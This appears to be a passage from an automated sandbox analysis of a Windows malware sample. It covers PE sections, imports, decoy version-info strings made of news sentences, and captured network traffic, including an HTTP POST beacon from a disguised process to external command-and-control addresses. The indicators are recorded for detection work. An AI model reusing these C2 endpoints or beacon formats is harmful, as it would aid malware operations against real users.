                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x234bb0x24000False0.560607910156data6.58324580938IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x250000x8cc40x9000False0.327446831597data4.91487847156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x2e0000x5b1c0x2000False0.308471679688data3.92934474844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x340000xf2d40x10000False0.807495117188data7.27970364915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                RT_CURSOR0x34bb00x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x34ce40xb4dataEnglishUnited States
                                                                                                                RT_CURSOR0x34d980x134AmigaOS bitmap fontEnglishUnited States
                                                                                                                RT_CURSOR0x34ecc0x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x350000x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x351340x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x352680x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x3539c0x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x354d00x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x356040x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x357380x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x3586c0x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x359a00x134AmigaOS bitmap fontEnglishUnited States
                                                                                                                RT_CURSOR0x35ad40x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x35c080x134dataEnglishUnited States
                                                                                                                RT_CURSOR0x35d3c0x134dataEnglishUnited States
                                                                                                                RT_BITMAP0x35e700xb8dataEnglishUnited States
                                                                                                                RT_BITMAP0x35f280x144dataEnglishUnited States
                                                                                                                RT_ICON0x3606c0x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676EnglishUnited States
                                                                                                                RT_ICON0x363540x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                RT_DIALOG0x3647c0x180dataEnglishUnited States
                                                                                                                RT_DIALOG0x365fc0x504dataEnglishUnited States
                                                                                                                RT_DIALOG0x36b000xe8dataEnglishUnited States
                                                                                                                RT_DIALOG0x36be80x34dataEnglishUnited States
                                                                                                                RT_STRING0x36c1c0x42dataEnglishUnited States
                                                                                                                RT_STRING0x36c600x82dataEnglishUnited States
                                                                                                                RT_STRING0x36ce40x2adataEnglishUnited States
                                                                                                                RT_STRING0x36d100x192dataEnglishUnited States
                                                                                                                RT_STRING0x36ea40x4e2dataEnglishUnited States
                                                                                                                RT_STRING0x373880x31adataEnglishUnited States
                                                                                                                RT_STRING0x376a40x2dcdataEnglishUnited States
                                                                                                                RT_STRING0x379800x8adataEnglishUnited States
                                                                                                                RT_STRING0x37a0c0xacdataEnglishUnited States
                                                                                                                RT_STRING0x37ab80xdedataEnglishUnited States
                                                                                                                RT_STRING0x37b980x4c4dataEnglishUnited States
                                                                                                                RT_STRING0x3805c0x264dataEnglishUnited States
                                                                                                                RT_STRING0x382c00x2cdataEnglishUnited States
                                                                                                                RT_STRING0x382ec0x42dataEnglishUnited States
                                                                                                                RT_RCDATA0x383300xa944dataEnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42c740x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42c980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cd40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42ce80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cfc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_ICON0x42db00x22dataEnglishUnited States
                                                                                                                RT_VERSION0x42dd40x4a8dataEnglishUnited States
                                                                                                                RT_MANIFEST0x4327c0x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                KERNEL32.dllSetErrorMode, HeapAlloc, HeapFree, HeapReAlloc, RaiseException, VirtualAlloc, RtlUnwind, GetCommandLineA, GetProcessHeap, GetStartupInfoA, ExitProcess, HeapSize, VirtualFree, HeapDestroy, HeapCreate, GetStdHandle, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetOEMCP, Sleep, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetACP, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCPInfo, CreateFileA, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, InterlockedDecrement, GetModuleFileNameW, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FreeResource, GetCurrentProcessId, GlobalAddAtomA, CloseHandle, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, LoadLibraryA, lstrcmpA, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, GetProcAddress, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, MulDiv, SetLastError, LocalAlloc, LocalLock, LocalFree, LocalUnlock, LoadLibraryExA, GetCurrentProcess, lstrlenA, CompareStringA, GetVersion, FindResourceA, LoadResource, LockResource, SizeofResource, GetLastError, WideCharToMultiByte, MultiByteToWideChar, IsDebuggerPresent, InterlockedExchange
                                                                                                                USER32.dllGetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ShowWindow, SetWindowTextA, IsDialogMessageA, DestroyMenu, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetSystemMenu, MessageBoxA, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, UnregisterClassA, GetTopWindow, LoadCursorA, DrawIcon, AppendMenuA, SendMessageA, IsIconic, GetClientRect, LoadIconA, EnableWindow, GetSystemMetrics, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, PostQuitMessage, PostMessageA, CheckMenuItem, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem
                                                                                                                GDI32.dllSetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
                                                                                                                WINSPOOL.DRVClosePrinter, DocumentPropertiesA, OpenPrinterA
                                                                                                                ADVAPI32.dllRegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
                                                                                                                SHLWAPI.dllPathFindFileNameA, PathFindExtensionA
                                                                                                                OLEAUT32.dllVariantClear, VariantChangeType, VariantInit

                                                                                                                Version Infos

                                                                                                                DescriptionData
                                                                                                                LegalCopyrightos Angeles County Sheriff's office has said it will no longer enforce a curfew put in place
                                                                                                                InternalNameRights group the American Civil Liberties Union
                                                                                                                FileVersion18, 7, 2, 19
                                                                                                                ProductNameThe Minnesota County Attorneys Association voted Thursday
                                                                                                                ProductVersion8, 2, 55, 17
                                                                                                                FileDescriptionSouth Africa's governing party said it is launching
                                                                                                                OriginalFilenameMinnesota's county attorneys want to give the state attorney general the authority
                                                                                                                Translation0x0409 0x04b0

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Feb 23, 2021 16:29:00.189143896 CET4972680192.168.2.7190.144.18.198
                                                                                                                Feb 23, 2021 16:29:03.312611103 CET4972680192.168.2.7190.144.18.198
                                                                                                                Feb 23, 2021 16:29:09.313180923 CET4972680192.168.2.7190.144.18.198
                                                                                                                Feb 23, 2021 16:29:24.575964928 CET497348080192.168.2.779.143.178.194
                                                                                                                Feb 23, 2021 16:29:27.580352068 CET497348080192.168.2.779.143.178.194
                                                                                                                Feb 23, 2021 16:29:33.580770969 CET497348080192.168.2.779.143.178.194
                                                                                                                Feb 23, 2021 16:29:49.008862972 CET497428080192.168.2.787.106.136.232
                                                                                                                Feb 23, 2021 16:29:49.055773020 CET80804974287.106.136.232192.168.2.7
                                                                                                                Feb 23, 2021 16:29:49.628982067 CET497428080192.168.2.787.106.136.232
                                                                                                                Feb 23, 2021 16:29:49.675973892 CET80804974287.106.136.232192.168.2.7
                                                                                                                Feb 23, 2021 16:29:50.238393068 CET497428080192.168.2.787.106.136.232
                                                                                                                Feb 23, 2021 16:29:50.285260916 CET80804974287.106.136.232192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.407538891 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.452661991 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.453526974 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.453563929 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.453639030 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.498728991 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.498744011 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515777111 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515794992 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515810966 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515826941 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515840054 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515852928 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515861034 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.515966892 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.516005039 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.516670942 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.516690016 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.516705990 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.516802073 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.516820908 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562264919 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562304020 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562325001 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562345982 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562361956 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562381983 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562403917 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562406063 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562428951 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562457085 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562474012 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562479973 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562486887 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562498093 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562516928 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562551022 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562556028 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562582970 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562634945 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.562675953 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.562690020 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.563805103 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.563832998 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.563870907 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.563884020 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.563906908 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.563925028 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.563968897 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.563985109 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.563987970 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609021902 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609057903 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609076023 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609092951 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609117031 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609128952 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609143972 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609152079 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609164000 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609184980 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609189034 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609199047 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609220982 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609256983 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609265089 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609270096 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609273911 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609277964 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609282017 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609283924 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609308004 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609318018 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609324932 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609389067 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609392881 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609426975 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609481096 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609498978 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609514952 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609586954 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609595060 CET497528080192.168.2.787.106.139.101
                                                                                                                Feb 23, 2021 16:29:54.609754086 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609790087 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609812021 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609833002 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609857082 CET80804975287.106.139.101192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.609858036 CET497528080192.168.2.787.106.139.101

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Feb 23, 2021 16:28:25.466500998 CET6050153192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:25.517323017 CET53605018.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:26.732745886 CET5377553192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:26.784442902 CET53537758.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:26.937232971 CET5183753192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:26.995768070 CET53518378.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:27.932770014 CET5541153192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:27.984055042 CET53554118.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:29.361210108 CET6366853192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:29.409859896 CET53636688.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:30.187025070 CET5464053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:30.236861944 CET53546408.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:31.250220060 CET5873953192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:31.299065113 CET53587398.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:32.266169071 CET6033853192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:32.323358059 CET53603388.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:33.101047039 CET5871753192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:33.158937931 CET53587178.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:35.787468910 CET5976253192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:35.838629961 CET53597628.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:37.038021088 CET5432953192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:37.089829922 CET53543298.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:38.992897034 CET5805253192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:39.041843891 CET53580528.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:40.126162052 CET5400853192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:40.177434921 CET53540088.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:41.747036934 CET5945153192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:41.798511982 CET53594518.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:42.976083994 CET5291453192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:43.025271893 CET53529148.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:44.236706018 CET6456953192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:44.288336992 CET53645698.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:45.514019012 CET5281653192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:45.569581032 CET53528168.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:46.707571983 CET5078153192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:46.759145021 CET53507818.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:48.848829031 CET5423053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:48.904294014 CET53542308.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:50.740236044 CET5491153192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:50.797322035 CET53549118.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:51.376462936 CET4995853192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:51.438911915 CET53499588.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:51.700440884 CET5086053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:51.753202915 CET53508608.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:28:54.026443005 CET5045253192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:28:54.075861931 CET53504528.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:02.131201029 CET5973053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:02.179775953 CET53597308.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:20.661921978 CET5931053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:20.722384930 CET53593108.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:20.962333918 CET5191953192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:21.011264086 CET53519198.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:22.736326933 CET6429653192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:22.784879923 CET53642968.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:31.201035976 CET5668053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:31.268256903 CET53566808.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:47.720910072 CET5882053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:47.787590981 CET53588208.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:48.423604012 CET6098353192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:48.490135908 CET53609838.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:49.063095093 CET4924753192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:49.120388031 CET53492478.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:49.743591070 CET5228653192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:49.828109980 CET53522868.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:50.048021078 CET5606453192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:50.099646091 CET53560648.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:50.346640110 CET6374453192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:50.457186937 CET53637448.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:50.994074106 CET6145753192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:51.059099913 CET53614578.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:51.663366079 CET5836753192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:51.723073006 CET53583678.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:52.550688982 CET6059953192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:52.631799936 CET53605998.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:53.520988941 CET5957153192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:53.578318119 CET53595718.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:29:54.077132940 CET5268953192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:29:54.142081976 CET53526898.8.8.8192.168.2.7
                                                                                                                Feb 23, 2021 16:30:25.146941900 CET5029053192.168.2.78.8.8.8
                                                                                                                Feb 23, 2021 16:30:25.198834896 CET53502908.8.8.8192.168.2.7

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • 87.106.139.101
                                                                                                                  • 87.106.139.101:8080

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                0192.168.2.74975287.106.139.1018080C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                Feb 23, 2021 16:29:54.453563929 CET10963OUTPOST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1
                                                                                                                Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/
                                                                                                                Content-Type: multipart/form-data; boundary=---------------------------270479976396707
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                Host: 87.106.139.101:8080
                                                                                                                Content-Length: 4596
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Feb 23, 2021 16:29:54.515777111 CET10981INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 23 Feb 2021 15:29:54 GMT
                                                                                                                Content-Type: test/html; charset=UTF-8
                                                                                                                Content-Length: 535876
                                                                                                                Connection: keep-alive
                                                                                                                vary: Accept-Encoding
